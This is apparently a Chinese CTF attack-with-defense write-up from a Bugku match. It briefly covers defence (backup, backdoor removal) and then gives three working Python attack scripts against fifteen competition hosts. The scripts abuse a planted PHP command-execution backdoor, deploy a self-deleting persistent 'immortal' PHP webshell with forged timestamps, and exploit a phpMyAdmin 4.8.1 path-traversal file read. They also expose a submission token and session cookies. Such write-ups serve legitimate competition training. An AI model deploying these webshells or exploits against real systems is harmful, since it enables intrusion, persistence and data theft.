
7.25bugkuawd

7.25bugkuawd

这次我们第三,有一小段时间是第一,也算是熟练起来了

image-20250725213015557

防御阶段

首先我们先备份

# Backup of the web root taken before anything is deleted (the D盾 scan and
# backdoor removal come next in the post).  The source path is relative
# (var/www/html, no leading slash), so this only works with cwd = / and
# writes web.tar.gz into that same cwd.
tar -czvf web.tar.gz var/www/html

D盾扫描,这次学聪明了

后门直接删掉没影响

image-20250725205201793

这次不知道为什么push不上去,直接在vps里面改了

然后就是准备搓脚本刷分了

攻击阶段

用最简单的那个马攻击,发现能打通

import requests
import time
from datetime import datetime

# Target URL list: one AWD box per team, as recorded in this write-up.
urls = [
    "http://192-168-1-1.pvp6235.bugku.cn",
    "http://192-168-1-63.pvp6235.bugku.cn",
    "http://192-168-1-68.pvp6235.bugku.cn",
    "http://192-168-1-74.pvp6235.bugku.cn",
    "http://192-168-1-78.pvp6235.bugku.cn",
    "http://192-168-1-100.pvp6235.bugku.cn",
    "http://192-168-1-116.pvp6235.bugku.cn",
    "http://192-168-1-135.pvp6235.bugku.cn",
    "http://192-168-1-168.pvp6235.bugku.cn",
    "http://192-168-1-186.pvp6235.bugku.cn",
    "http://192-168-1-189.pvp6235.bugku.cn",
    "http://192-168-1-215.pvp6235.bugku.cn",
    "http://192-168-1-234.pvp6235.bugku.cn",
    "http://192-168-1-250.pvp6235.bugku.cn",
    "http://192-168-1-255.pvp6235.bugku.cn"
]


# Request path of the command-execution entry point present on every target;
# the "s" query parameter is handed to PHP system().
# NOTE(review): presumably the same pre-planted backdoor the D盾 scan flagged
# during the defence phase — the post does not say so explicitly.  On the
# defending side, deleting this file is what closes the hole.
path = "/mc-files/pages/data/config.php?s=system('cat /flag')"

# Flag submission settings for the scoring platform.
submit_base_url = "https://ctf.bugku.com/pvp/submit.html"
# NOTE(review): a live per-team submission token is hard-coded here and
# published with this write-up; presumably anyone holding it can submit on
# the team's behalf.  Treat it as compromised and read it from the
# environment rather than the source.
token = "5c36b27bb325ea000cf52a3fcd60b4a7"

# Seconds between scan rounds.  The original comment said "3 minutes
# (180 s)", but the value is 300 s = 5 minutes; the start-up banner in the
# main block still says "every 3 minutes".
DELAY = 300

def scan_and_submit() -> None:
    """Run one round: GET the RCE path on every target, print any flag found
    in the body and submit it with a GET to ``submit_base_url``.

    Side effects only (prints, HTTP requests); returns nothing.  Every
    per-target exception is caught and printed so one unreachable host does
    not abort the round.
    """
    print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 开始新一轮扫描...")
    
    for base_url in urls:
        url = base_url + path
        try:
            # Issue the command; /flag is expected to come back in the body.
            resp = requests.get(url, timeout=5)
            if "flag" in resp.text.lower():
                flag = resp.text.strip()
                print(f"\n==== 发现flag在 {url} ====")
                print(flag)
                
                # Cut out the flag (assumes the format flag{...}).
                if "flag{" in flag and "}" in flag:
                    # NOTE(review): index("}") searches from the start of the
                    # whole response, not from "flag{"; a "}" that appears
                    # earlier in the body gives an empty or wrong slice.
                    flag_content = flag[flag.index("flag{"):flag.index("}")+1]
                    
                    # Submit via GET: token and flag travel in the query
                    # string, so both end up in server/proxy access logs.
                    submit_url = f"{submit_base_url}?token={token}&flag={flag_content}"
                    try:
                        submit_resp = requests.get(submit_url, timeout=5)
                        print("\n=== 提交结果 ===")
                        print(submit_resp.text)
                    except Exception as submit_e:
                        print(f"[!] 提交flag失败: {submit_e}")
                
                print("\n" + "="*50 + "\n")
        except Exception as e:
            print(f"[!] {url} 请求失败: {e}")

# Main loop: rescan every DELAY seconds until Ctrl+C.
if __name__ == "__main__":
    # NOTE(review): the banner says "every 3 minutes" but DELAY is 300 s.
    print("脚本开始运行,将每3分钟扫描一次目标URL...")
    print("按Ctrl+C终止脚本")
    
    try:
        while True:
            scan_and_submit()
            print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 本轮扫描完成,等待{DELAY}秒后继续...")
            time.sleep(DELAY)
    except KeyboardInterrupt:
        print("\n脚本已终止")

然后种不死马

import requests
from datetime import datetime

# Target URL list (the same AWD hosts as the first script).
urls = [
    "http://192-168-1-1.pvp6235.bugku.cn",
    "http://192-168-1-63.pvp6235.bugku.cn",
    "http://192-168-1-68.pvp6235.bugku.cn",
    "http://192-168-1-74.pvp6235.bugku.cn",
    "http://192-168-1-78.pvp6235.bugku.cn",
    "http://192-168-1-100.pvp6235.bugku.cn",
    "http://192-168-1-116.pvp6235.bugku.cn",
    "http://192-168-1-135.pvp6235.bugku.cn",
    "http://192-168-1-168.pvp6235.bugku.cn",
    "http://192-168-1-186.pvp6235.bugku.cn",
    "http://192-168-1-189.pvp6235.bugku.cn",
    "http://192-168-1-215.pvp6235.bugku.cn",
    "http://192-168-1-234.pvp6235.bugku.cn",
    "http://192-168-1-250.pvp6235.bugku.cn",
    "http://192-168-1-255.pvp6235.bugku.cn"
]

# RCE entry point used to write the file; write_webshell() appends the shell
# command as the argument of system(...).
path = "/mc-files/pages/data/config.php?s=system"

# PHP source of the "immortal" shell (不死马) written to the target.
# As visible below it: keeps running after the client disconnects
# (ignore_user_abort / set_time_limit), deletes its own file, then in an
# endless loop rewrites .config.php with a password-gated eval and resets
# that file's mtime to a fixed 2018 date.
# Defender notes: the forged mtime means "recently modified file" checks
# will not surface .config.php — compare content hashes against the backup
# taken in the defence phase instead.  Deleting the file alone does not help
# while the loop is alive (file_put_contents recreates it every 5 ms); the
# PHP process running this loop has to go too.  The traffic to look for is a
# request to /.config.php with a ?pass= query parameter and a POST field "a".
php_code = '''<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '.config.php';
$code = '<?php if(md5($_GET["pass"])=="d4e7fc2fe896ead7c10a69b25fec9015"){@eval($_POST[a]);} ?>';
while (1){
    file_put_contents($file,$code);
    system('touch -m -d "2018-12-01 09:10:12" .config.php');
    usleep(5000);
}
?>'''

def write_webshell() -> None:
    """Try to drop ``shell.php`` on every target through the RCE path, then
    request it once and report whether that request returned HTTP 200.

    Side effects only (prints, HTTP requests); returns nothing.
    """
    print(f"[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 开始尝试写入不死马...")
    
    for base_url in urls:
        # Hex-encode the PHP source so it survives URL and shell quoting, and
        # decode it on the target with xxd.  (The original comment said
        # "base64", but .hex() / xxd -r -p is hex.)  Loop-invariant, yet
        # recomputed for every target.
        encoded_php = php_code.encode('utf-8').hex()
        command = f"echo {encoded_php} | xxd -r -p > /var/www/html/shell.php"
        url = f"{base_url}{path}('{command}')"
        
        try:
            # Execute the write through system() on the target.
            resp = requests.get(url, timeout=5)
            print(f"\n==== 尝试在 {base_url} 写入不死马 ====")
            print(f"状态码: {resp.status_code}")
            print(f"响应内容: {resp.text[:100]}...")
            
            # "Verification": GET /shell.php and treat HTTP 200 as success.
            # NOTE(review): this GET is also what starts the dropper (which
            # then deletes itself and never returns), so it is not an
            # independent check; the success/failure lines below are not
            # reliable evidence of either outcome.
            check_url = f"{base_url}/shell.php"
            try:
                check_resp = requests.get(check_url, timeout=5)
                if check_resp.status_code == 200:
                    print(f"[+] 不死马写入成功: {check_url}")
                    # Hard-coded text; not derived from php_code.
                    print(f"访问密码: pass=ciallo123")
                else:
                    print(f"[-] 不死马可能写入失败: {check_url}")
            except Exception as check_e:
                print(f"[!] 验证失败: {check_e}")
                
            print("\n" + "="*50 + "\n")
        except Exception as e:
            print(f"[!] {url} 请求失败: {e}")

# Entry point: a single pass over all targets, no polling loop.
if __name__ == "__main__":
    print("不死马写入脚本开始运行...")
    write_webshell()
    print("脚本执行完成")

连接不死马提交flag

import requests
import time
import re
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed

# Configuration ==================================
# Same AWD hosts as the earlier scripts, built from the last octet.
TARGETS = [
    "http://192-168-1-{}.pvp6235.bugku.cn".format(i) 
    for i in [1,63,68,74,78,100,116,135,168,186,189,215,234,250,255]
]

# The file the dropper from the previous script keeps rewriting.
VULN_PATH = "/.config.php"
# "pass" gates the eval in that file (sent as a GET parameter); "a" is the
# PHP statement it evaluates (sent as POST form data).
PAYLOAD = {
    "pass": "ciallo123",
    "a": 'system("cat /flag");'  # requests URL-encodes this automatically
}

SUBMIT_URL = "https://ctf.bugku.com/pvp/submit.html"
# NOTE(review): the same live submission token as the earlier scripts,
# hard-coded and published — treat it as compromised.
TOKEN = "5c36b27bb325ea000cf52a3fcd60b4a7"
DELAY = 300  # seconds between rounds (5 minutes)
MAX_WORKERS = 3  # thread-pool size for the per-target requests
# ==============================================

# Browser-like request headers (original comment: "disguise headers,
# simulate browser behaviour").
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'keep-alive'
}

def exploit_target(url: str):
    """POST the eval payload to ``url + VULN_PATH`` and return the first
    ``flag{...}`` match from the response body.

    Args:
        url: scheme + host of one target, without a trailing slash.

    Returns:
        The matched flag string, or None when the request raised, the
        status was not 200, or no flag pattern was present.  Exceptions are
        printed (first 50 chars of the message) and swallowed.
    """
    try:
        # "pass" goes in the query string, "a" in the form body.
        resp = requests.post(
            url + VULN_PATH,
            params={"pass": PAYLOAD["pass"]},
            data={"a": PAYLOAD["a"]},
            headers=HEADERS,
            timeout=10,
            verify=False  # original comment: TLS verification may be off in the competition environment (TARGETS are plain http anyway)
        )
        
        if resp.status_code == 200:
            # Exact flag format: letters, digits, "_" and "-" inside braces.
            flag_match = re.search(r'flag\{[a-zA-Z0-9_-]+\}', resp.text)
            if flag_match:
                return flag_match.group(0)
    except Exception as e:
        print(f"[!] {url} 请求失败: {str(e)[:50]}...")
    return None

def submit_flag(flag):
    """Send *flag* to the scoring endpoint and return the raw response text.

    The token and flag are placed in the query string unchanged (no extra
    encoding).  Network or HTTP errors are not raised: a short failure
    message containing the exception is returned instead.
    """
    # NOTE(review): token in the URL means it lands in access/proxy logs.
    submit_url = f"{SUBMIT_URL}?token={TOKEN}&flag={flag}"
    try:
        return requests.get(submit_url, timeout=5).text
    except Exception as err:
        return f"提交失败: {err}"

def scan_round() -> None:
    """Run exploit_target over TARGETS on a thread pool and submit every
    flag that comes back, printing progress.  Side effects only.
    """
    print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 启动扫描...")
    
    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        # future -> target url, so results can be attributed as they finish.
        futures = {executor.submit(exploit_target, url): url for url in TARGETS}
        
        for future in as_completed(futures):
            url = futures[future]
            try:
                # exploit_target catches its own exceptions, so result() is
                # normally a str or None; this except is a last resort.
                flag = future.result()
                if flag:
                    print(f"\n[+] 发现flag @ {url}")
                    print(f"Flag内容: {flag}")
                    
                    # Submit the flag and print the platform's reply.
                    result = submit_flag(flag)
                    print(f"提交结果: {result}")
                    
                    print("-" * 50)
            except Exception as e:
                print(f"[!] {url} 处理异常: {e}")

def main() -> None:
    """Print the banner, then run scan_round every DELAY seconds until
    Ctrl+C.
    """
    # NOTE(review): the banner advertises rate limiting and an automatic
    # retry mechanism; the visible code only sleeps DELAY between rounds and
    # has no retry logic (exploit_target prints a failure and returns None).
    print("""\
=====================================
CTF Flag自动提交系统 (合法竞赛用途)
版本: 2.0
注意事项:
1. 仅用于授权比赛环境
2. 自动限制请求频率
3. 异常自动重试机制
=====================================""")
    
    try:
        while True:
            scan_round()
            print(f"\n本轮完成,等待 {DELAY//60} 分钟后继续...")
            time.sleep(DELAY)
    except KeyboardInterrupt:
        print("\n[!] 用户终止脚本")

# Script entry point.
if __name__ == "__main__":
    main()

后面发现我们被打了,在主机上发现了shell.php,直接删了;看备份的源码,想到phpmyadmin还有后台默认密码

用root/root进了,赶紧修;然后尝试打别人,搜到phpmyadmin 4.8.1有个任意文件读取漏洞

结果只有一队能打

import requests
import re
import time  # 添加这行导入
from datetime import datetime

# Target configuration ==========================
# Single target: the phpMyAdmin 4.8.1 file-read issue the post mentions,
# reached through the "target" parameter with a double-encoded "?" (%253f)
# and "../" traversal, ending at /flag.
# Defender side: the post also notes the default root/root phpMyAdmin
# credentials — rotate them and upgrade phpMyAdmin past 4.8.1.
TARGET_URL = "http://192-168-1-63.pvp6235.bugku.cn/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../../flag"
SUBMIT_URL = "https://ctf.bugku.com/pvp/submit.html"
# NOTE(review): the same live submission token as the earlier scripts,
# hard-coded and published — treat it as compromised.
TOKEN = "5c36b27bb325ea000cf52a3fcd60b4a7"
# ==============================================

# Headers copied verbatim from a captured request (original comment:
# "exact traffic copy, from your packet capture").
# NOTE(review): the Cookie line carries a phpMyAdmin session id plus the
# pmaUser-1 / pmaAuth-1 cookies, i.e. a logged-in session; these are
# credentials and should have been redacted before publishing.
HEADERS = {
    'Host': '192-168-1-63.pvp6235.bugku.cn',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
    'Cookie': 'phpMyAdmin=k370v0siolmju7v8uq5p9a13ti3sqj6g; pma_lang=zh_CN; pmaUser-1=%7B%22iv%22%3A%22ysgto0Obh3GEG69wQNe37A%3D%3D%22%2C%22mac%22%3A%22a17bc7caf04bafade0936ef340691ade7038a9cf%22%2C%22payload%22%3A%22AKNcEnMMDSaKxqsgQR5nUA%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%222HA4rPPmNh%5C%2FiIdNp7XYb6Q%3D%3D%22%2C%22mac%22%3A%220d997e973605ec56d97d21ee56a24869aac7546e%22%2C%22payload%22%3A%22crgUOlmMdyKrmrYaTgOrbZAzGZkGidztL7epskA%5C%2Fs%5C%2Fw%3D%22%7D',
    'Upgrade-Insecure-Requests': '1',
    'Priority': 'u=0, i'
}

def extract_flag(text):
    """Pull a flag out of *text*, or return None.

    A ``flag{...}`` token (letters, digits, "_" and "-") wins.  Failing
    that, a bare 32-hex-digit run that is not immediately preceded by
    "flag" nor followed by "}" is wrapped as ``flag{<hex>}``.  Any error
    raised while matching is swallowed and None is returned.
    """
    candidates = (
        (r'flag\{[a-zA-Z0-9_\-]+\}', lambda m: m.group()),
        (r'(?<!flag)[a-fA-F0-9]{32}(?!})', lambda m: f"flag{{{m.group()}}}"),
    )
    try:
        for pattern, render in candidates:
            found = re.search(pattern, text)
            if found is not None:
                return render(found)
    except Exception:
        pass
    return None

def attack_target() -> None:
    """Send the captured phpMyAdmin request once; on HTTP 200 extract a
    flag from the body and submit it.  Side effects only (prints, HTTP).
    """
    print(f"[{datetime.now().strftime('%H:%M:%S')}] 启动攻击...")
    try:
        resp = requests.get(
            TARGET_URL,
            headers=HEADERS,
            timeout=10,
            verify=False,
            allow_redirects=False  # do not follow redirects
        )
        
        if resp.status_code == 200:
            print("[+] 攻击成功,响应长度:", len(resp.text))
            flag = extract_flag(resp.text)
            
            if flag:
                print(f"[+] 提取到Flag: {flag}")
                # Submit the flag; token and flag travel in the query string.
                # A failure here is caught by the outer except below and
                # reported as a generic error.
                submit_resp = requests.get(
                    f"{SUBMIT_URL}?token={TOKEN}&flag={flag}",
                    timeout=5
                )
                print(f"[+] 提交结果: {submit_resp.status_code}")
                print(submit_resp.text[:100])  # first 100 chars of the reply
            else:
                print("[-] 响应中未识别到Flag格式")
                print("响应样本:", resp.text[:200])  # first 200 chars
        else:
            print(f"[!] 攻击失败,HTTP状态码: {resp.status_code}")
            
    except Exception as e:
        # Only the exception class name is printed, not its message.
        print(f"[!] 发生错误: {type(e).__name__}")

# Entry point: run attack_target once every 300 s until Ctrl+C.
if __name__ == "__main__":
    print("""\
=====================================
PHPMyAdmin精准攻击工具
特征:
1. 完全模拟原始流量包
2. 保留所有原始Header和Cookie
3. 智能Flag提取系统
=====================================""")
    
    while True:
        attack_target()
        wait_time = 300  # seconds; re-assigned on every iteration
        print(f"\n等待{wait_time}秒后重试... (Ctrl+C终止)")
        try:
            time.sleep(wait_time)
        except KeyboardInterrupt:
            # Ctrl+C is handled only during the sleep; attack_target catches
            # Exception, not KeyboardInterrupt, so an interrupt there
            # propagates with a traceback.
            print("\n[!] 用户终止攻击")
            break

后面挂机然后发现不死马被删了,确实没办法了,phpmyadmin弱密码进不去的话别的利用也做不到,下次得学用bash的马,比较难杀的
